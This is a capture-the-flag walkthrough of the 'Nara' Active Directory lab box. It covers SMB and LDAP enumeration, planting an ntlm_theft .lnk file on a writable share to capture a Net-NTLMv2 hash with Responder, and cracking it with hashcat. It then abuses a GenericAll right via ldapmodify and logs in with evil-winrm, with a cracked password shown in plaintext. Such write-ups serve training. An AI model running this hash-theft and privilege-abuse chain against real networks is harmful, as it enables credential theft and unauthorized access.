Proving Grounds Practice - Nara

Difficulty

easy

categories

AD

Scan

53 dig axfr

The command below has no zone name after AXFR, so dig is not actually requesting a transfer of the nara-security.com zone (the form to try is dig AXFR nara-security.com @192.168.178.30); as run it simply times out.

dig AXFR -p 53 @192.168.178.30
;; communications error to 192.168.178.30#53: timed out

; <<>> DiG 9.20.2-1-Debian <<>> AXFR -p 53 @192.168.178.30
; (1 server found)
;; global options: +cmd
;; Query time: 4718 msec
;; SERVER: 192.168.178.30#53(192.168.178.30) (UDP)
;; WHEN: Sat Mar 15 09:20:53 CST 2025
;; MSG SIZE rcvd: 28

ldapsearch

ldapsearch -H ldap://192.168.178.30 -x -b "DC=nara-security,DC=com" |tee ldap_dump
# extended LDIF
#
# LDAPv3
# base <DC=nara-security,DC=com> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090AC9, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v4f7c

# numResponses: 1

smbclient

smbclient -L //192.168.178.30 -N

Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
nara Disk company share
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 192.168.178.30 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

get Important.txt

smbclient //192.168.178.30/nara -N
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Jul 30 22:31:58 2023
.. DHS 0 Sat Mar 15 09:18:08 2025
Documents D 0 Sun Jul 30 22:03:13 2023
Important.txt A 2200 Sun Jul 30 22:05:31 2023
IT D 0 Mon Jul 31 00:22:50 2023

7699711 blocks of size 4096. 4153067 blocks available
smb: \> get Important.txt
getting file \Important.txt of size 2200 as Important.txt (2.9 KiloBytes/sec) (average 2.9 KiloBytes/sec)
smb: \> cd Documents\
smb: \Documents\> ls
. D 0 Sun Jul 30 22:03:13 2023
.. D 0 Sun Jul 30 22:31:58 2023

7699711 blocks of size 4096. 4152768 blocks available
smb: \Documents\> cd ..
smb: \> cd IT
smb: \IT\> ls
. D 0 Mon Jul 31 00:22:50 2023
.. D 0 Sun Jul 30 22:31:58 2023

7699711 blocks of size 4096. 4152768 blocks available
smb: \IT\> exit

The note tells employees to check the files under the shared Documents folder regularly. That is the hint: something on the box is simulating a user who browses that folder, so anything dropped there will be opened.

cat Important.txt 
Dear Team,

We hope this message finds you well. We wanted to remind all employees to take a moment each day to check the shared documents folder diligently. As part of our commitment to streamline processes and enhance efficiency, important documents are frequently uploaded to this folder for your attention and action.

The shared documents folder serves as a central hub for crucial updates, contracts, agreements, and various other essential materials requiring your attention. To ensure that you don't miss any critical information, please make it a habit to access the folder at the beginning of your workday or as often as possible.

Here are a few simple steps to stay up-to-date and ensure timely actions:

* Access the Shared Documents Folder: Log in to your company account and navigate to the designated shared documents folder. If you encounter any issues accessing the folder, please reach out to the IT department for assistance.

* Review New Additions: Look for any new documents that might have been uploaded since your last visit. These documents might require your signature, feedback, or acknowledgment.

* Take Action Promptly: If there are documents that need your attention, please act promptly and follow the necessary procedures as indicated within each document. Whether it's a signature, a comment, or any other form of response, timely actions are vital to keep our operations running smoothly.

* Seek Clarification: If you encounter any uncertainty or have questions about the documents you find, don't hesitate to reach out to the relevant department or the person mentioned in the document for clarification. It's essential that you fully understand what's required before proceeding.

Remember, staying informed and acting promptly ensures that projects progress seamlessly, contracts get executed on time, and the company as a whole operates efficiently. Your cooperation in this matter is greatly appreciated and contributes to our collective success.

Thank you for your attention to this matter, and if you have any concerns or suggestions to improve our document management process, please share them with your department head or the HR team.

Foothold

smb hash steal

A quick smbclient put test.txt shows the share is writable. Use ntlm_theft.py to generate a .lnk file whose icon points at the attacker's SMB listener (-s is the attacker IP), upload it to the Documents folder, and wait for an unlucky user to open it. For the .lnk variant, merely browsing the folder in Explorer is enough to trigger the authentication (the generator marks it BROWSE TO FOLDER).

python3 ntlm_theft.py -g all -s 192.168.45.241 -f test
Created: test/test.scf (BROWSE TO FOLDER)
Created: test/test-(url).url (BROWSE TO FOLDER)
Created: test/test-(icon).url (BROWSE TO FOLDER)
Created: test/test.lnk (BROWSE TO FOLDER)
Created: test/test.rtf (OPEN)
Created: test/test-(stylesheet).xml (OPEN)
Created: test/test-(fulldocx).xml (OPEN)
Created: test/test.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
Created: test/test-(includepicture).docx (OPEN)
Created: test/test-(remotetemplate).docx (OPEN)
Created: test/test-(frameset).docx (OPEN)
Created: test/test-(externalcell).xlsx (OPEN)
Created: test/test.wax (OPEN)
Created: test/test.m3u (OPEN IN WINDOWS MEDIA PLAYER ONLY)
Created: test/test.asx (OPEN)
Created: test/test.jnlp (OPEN)
Created: test/test.application (DOWNLOAD AND OPEN)
Created: test/test.pdf (OPEN AND ALLOW)
Created: test/zoom-attack-instructions.txt (PASTE TO CHAT)
Created: test/Autorun.inf (BROWSE TO FOLDER)
Created: test/desktop.ini (BROWSE TO FOLDER)
Generation Complete.
smb: \> cd Documents\
smb: \Documents\> put test.lnk
putting file test.lnk as \Documents\test.lnk (3.8 kb/s) (average 1.7 kb/s)
smb: \Documents\> ls
. D 0 Sat Mar 15 13:48:09 2025
.. D 0 Sat Mar 15 13:42:07 2025
test.lnk A 2164 Sat Mar 15 13:48:10 2025

7699711 blocks of size 4096. 3506757 blocks available

Start Responder on the Kali box listening on the VPN interface; after a short wait it captures Tracy.White's Net-NTLMv2 challenge/response. The line Responder logs is already in hashcat's -m 5600 layout (USER::DOMAIN:serverchallenge:NTProofStr:blob).

Crack it with hashcat (mode 5600 is NetNTLMv2; hashcat also autodetects it): hashcat white.hash /usr/share/wordlists/rockyou.txt

With this username and password, neither WinRM nor RDP logins work: the credentials are valid, but the account is not in a group that grants remote access.

bloodhound

Next, run bloodhound-python with the recovered credentials to look for an exploitable path:

bloodhound-python --dns-tcp -ns 192.168.178.30 -d nara-security.com -u Tracy.White -p zqwj041FGX -c all

Import all the JSON files into BloodHound and look at what Tracy.White can do.

She has full control (GenericAll) over the Remote Access group. The abuse method BloodHound suggests did not work here, so the membership is added directly over LDAP instead.
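The same question ("what does Tracy.White control?") answered without the GUI, as an added example that is not part of the original writeup: it reads the bloodhound-python JSON files and lists the object-control rights a principal holds, directly or through the groups it belongs to. It assumes the collector's v4-style layout (a top-level "data" list whose entries carry "ObjectIdentifier", "Properties"."name", "Aces" with PrincipalSID/RightName, and "Members" on groups). The two documents embedded below are constructed samples with made-up SIDs, not the collection from the box.

```python
"""Added example: pull a principal's outbound control rights from
bloodhound-python JSON output.  Sample documents are constructed."""
import glob
import json
import sys

# Edge names BloodHound reports that let the holder take over the target
CONTROL_RIGHTS = {
    "GenericAll", "GenericWrite", "WriteDacl", "WriteOwner", "Owns",
    "AddMember", "AddSelf", "ForceChangePassword", "AllExtendedRights",
}

DOMAIN = "S-1-5-21-1111111111-2222222222-3333333333"  # made-up domain SID
TRACY, STAFF, REMOTE, IT_GRP, DA = [f"{DOMAIN}-{rid}" for rid in (1105, 1201, 1601, 1602, 512)]

USERS_JSON = {"meta": {"type": "users"}, "data": [
    {"ObjectIdentifier": TRACY, "Properties": {"name": "TRACY.WHITE@NARA-SECURITY.COM"}, "Aces": []},
]}
GROUPS_JSON = {"meta": {"type": "groups"}, "data": [
    {"ObjectIdentifier": STAFF, "Properties": {"name": "STAFF@NARA-SECURITY.COM"},
     "Members": [{"ObjectIdentifier": TRACY, "ObjectType": "User"}], "Aces": []},
    {"ObjectIdentifier": REMOTE, "Properties": {"name": "REMOTE ACCESS@NARA-SECURITY.COM"},
     "Members": [],
     "Aces": [{"PrincipalSID": DA, "PrincipalType": "Group", "RightName": "Owns", "IsInherited": False},
              {"PrincipalSID": TRACY, "PrincipalType": "User", "RightName": "GenericAll", "IsInherited": False}]},
    {"ObjectIdentifier": IT_GRP, "Properties": {"name": "IT@NARA-SECURITY.COM"},
     "Members": [],
     "Aces": [{"PrincipalSID": STAFF, "PrincipalType": "Group", "RightName": "AddMember", "IsInherited": False}]},
    {"ObjectIdentifier": DA, "Properties": {"name": "DOMAIN ADMINS@NARA-SECURITY.COM"},
     "Members": [], "Aces": []},
]}


def load_collection(directory):
    """Parse every *.json the collector dropped into a directory."""
    docs = []
    for path in sorted(glob.glob(f"{directory}/*.json")):
        with open(path, encoding="utf-8-sig") as fh:  # tolerates a BOM if present
            docs.append(json.load(fh))
    return docs


def index_objects(docs):
    """SID -> display name, and SID -> set of groups it is a direct member of."""
    names, member_of = {}, {}
    for doc in docs:
        for obj in doc.get("data", []):
            sid = obj["ObjectIdentifier"]
            names[sid] = obj.get("Properties", {}).get("name", sid)
            for m in obj.get("Members") or []:
                member_of.setdefault(m["ObjectIdentifier"], set()).add(sid)
    return names, member_of


def group_closure(sid, member_of):
    """The principal plus every group it belongs to, transitively."""
    seen, todo = set(), [sid]
    while todo:
        cur = todo.pop()
        if cur not in seen:
            seen.add(cur)
            todo.extend(member_of.get(cur, ()))
    return seen


def sid_for(docs, name):
    names, _ = index_objects(docs)
    return next((s for s, n in names.items() if n.upper() == name.upper()), None)


def outbound_control(docs, principal_sid):
    """Sorted (target, right, via) tuples for rights held directly or via a group."""
    names, member_of = index_objects(docs)
    holders = group_closure(principal_sid, member_of)
    found = set()
    for doc in docs:
        for obj in doc.get("data", []):
            for ace in obj.get("Aces") or []:
                if ace["PrincipalSID"] in holders and ace["RightName"] in CONTROL_RIGHTS:
                    target = names.get(obj["ObjectIdentifier"], obj["ObjectIdentifier"])
                    found.add((target, ace["RightName"], names.get(ace["PrincipalSID"], ace["PrincipalSID"])))
    return sorted(found)


if __name__ == "__main__":
    # usage: script.py <dir with collector json> [principal name]; no args runs on the samples
    docs = load_collection(sys.argv[1]) if len(sys.argv) > 1 else [USERS_JSON, GROUPS_JSON]
    who = sys.argv[2] if len(sys.argv) > 2 else "TRACY.WHITE@NARA-SECURITY.COM"
    for target, right, via in outbound_control(docs, sid_for(docs, who)):
        print(f"{who} -> {right} -> {target} (via {via})")
```

Rights inherited through group membership are the ones the GUI's default user view hides until you expand the group nodes, which is why the closure over "Members" is computed before matching ACEs.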

ldapmodify

cat groupadd.ldif 
dn: CN=Remote Access,OU=remote,DC=nara-security,DC=com
changetype: modify
add: member
member: CN=Tracy White,OU=staff,DC=nara-security,DC=com

ldapmodify -x -D "Tracy.White@nara-security.com" -w zqwj041FGX -H ldap://nara-security.com -f groupadd.ldif

Confirm the change took (an ldapsearch with the same bind against the group DN should now list Tracy White in the member attribute), then log in with evil-winrm; the credentials that were refused earlier work once the account is in Remote Access:

evil-winrm -i 192.168.178.30 -u "Tracy.White" -p "zqwj041FGX"
*Evil-WinRM* PS C:\Users\tracy.white\Documents> whoami
narasec\tracy.white

*Evil-WinRM* PS C:\Users\tracy.white\Documents> ls
Directory: C:\Users\tracy.white\Documents


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 7/30/2023 3:05 PM 373 automation.txt

*Evil-WinRM* PS C:\Users\tracy.white\Documents> cat automation.txt
Enrollment Automation Account

01000000d08c9ddf0115d1118c7a00c04fc297eb0100000001e86ea0aa8c1e44ab231fbc46887c3a0000000002000000000003660000c000000010000000fc73b7bdae90b8b2526ada95774376ea0000000004800000a000000010000000b7a07aa1e5dc859485070026f64dc7a720000000b428e697d96a87698d170c47cd2fc676bdbd639d2503f9b8c46dfc3df4863a4314000000800204e38291e91f37bd84a3ddb0d6f97f9eea2b

The string in automation.txt is a DPAPI blob in hex (it starts with version 01000000 followed by the DPAPI provider GUID d08c9ddf-0115-d111-8c7a-00c04fc297eb), the format ConvertFrom-SecureString produces without -Key; such a blob can only be unprotected in the context of the account that protected it.

Nice Walkthrough

https://hackmd.io/@Abzee/Nara?utm_source=preview-mode&utm_medium=rec